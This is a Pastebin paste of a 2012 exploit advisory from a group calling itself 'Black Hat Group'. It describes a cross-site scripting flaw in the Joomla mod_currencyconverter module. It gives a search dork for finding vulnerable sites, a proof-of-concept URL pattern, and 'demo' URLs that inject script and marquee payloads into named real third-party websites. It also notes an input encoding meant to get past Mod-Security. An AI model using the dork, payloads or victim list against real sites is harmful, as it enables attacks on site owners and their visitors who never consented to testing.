Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################################################################
- # More exploits: http://adf.ly/5EHaQ ! #
- ###############################################################################
- # Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
- # Date: 2012-02-02 [GMT +7]
- # Author: BHG Security Center
- # Software Link: http://joomla.org
- # Dork: inurl:/includes/convert.php?from=
- # Tested on: ubuntu 11.04
- # CVE : -
- -----------------------------------------------------------------------------------------
- Joomla modules (mod_currencyconverter) XSS Vulnerability
- -----------------------------------------------------------------------------------------
- Author : BHG Security Center
- Date : 2012-02-02
- Location : Iran
- Web : http://Black-Hg.Org
- Critical Lvl : Medium
- Where : From Remote
- My Group : Black Hat Group #BHG
- ---------------------------------------------------------------------------
- PoC/Exploit:
- ~~~~~~~~~~
- ------------- ( Cross Site Scripting ) ~
- ~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
- ------------- ( Demo Vulnerability ) ~
- Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
- Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
- Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
- Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
- Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
- Timeline:
- ~~~~~~~~~
- - 29 - 01 - 2012 bug found.
- - 01 - 02 - 2012 vendor contacted, but no response.
- - 02 - 02 - 2012 Advisories release.
- ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement